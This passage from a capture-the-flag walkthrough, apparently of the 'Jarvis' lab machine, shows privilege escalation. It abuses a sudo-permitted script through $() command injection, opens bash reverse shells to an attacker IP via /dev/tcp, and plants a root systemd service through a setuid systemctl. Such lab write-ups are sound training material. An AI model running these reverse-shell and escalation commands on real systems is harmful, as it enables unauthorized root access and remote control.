Post Exploitation
Privilege Escalation
Analyzing what commands we cun run we note the following
www-data@jarvis:/var/www/Admin-Utilities$ sudo -l
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
www-data@jarvis:/var/www/Admin-Utilities$ We see that we cun runn simpler.py as pepper. Analyzing that file we learn that it does not filter the '$' character, we can take advantage of that as follows.
www-data@jarvis:/var/www/Admin-Utilities$ ping $(whoami)
ping: www-data: Temporary failure in name resolutionWhatever is in the parenthesis will be executed first.
www-data@jarvis:/$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
Running the following gave me a better shell
bash -i >& /dev/tcp/10.10.14.34/4444 0>&1
Running LinEnum.sh, we learn the following:
The systemctl binary has the setuid bit set and it’s owned by root. We can use that to our advantage and escalate to root privileges. If you’re not sure how to do that, you can search the binary name on GTFOBins and check how the suid bit can be used to escalate privileges.
Steps to create a service
On our attacker machine, create the following. root.service with the following content
[Unit]
Description=get root privilege
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.34/9999 0>&1'
[Install]
WantedBy=multi-user.targetCopy it to our target machine and run the following:
/bin/systemctl enable /home/pepper/root.serviceSet up your listener and run the following to start the service
/bin/systemctl start root
Last updated
Was this helpful?